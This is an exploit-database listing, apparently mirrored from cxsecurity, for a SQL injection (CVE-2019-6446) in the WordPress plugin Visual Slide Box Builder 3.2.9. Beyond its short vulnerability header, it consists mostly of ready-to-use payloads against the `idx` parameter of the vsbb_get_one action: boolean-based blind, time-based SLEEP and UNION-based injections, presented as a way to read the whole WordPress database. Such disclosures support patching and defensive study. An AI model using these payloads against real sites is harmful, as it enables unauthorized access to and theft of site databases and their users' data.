Advertisement






WordPress Plugin Visual Slide Box Builder 3.2.9 SQLi

CVE Category Price Severity
CVE-2019-6446 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-07-28
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070075

Below is a copy:

WordPress Plugin Visual Slide Box Builder 3.2.9 SQLi
# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Author: nu11secur1ty
# Date: 07.11.2022
# Vendor: https://wphive.com/
# Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin

## Description:
The parameter `idx` from the Visual Slide Box Builder plugin app for
WordPress appears to be vulnerable to SQLi.
The attacker can receive all database information from the WordPress
database and he can use it for very malicious purposes.

[+] Payloads:

```mysql
---
Parameter: idx (GET)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
HAVING 1854=1854

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
---
```

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.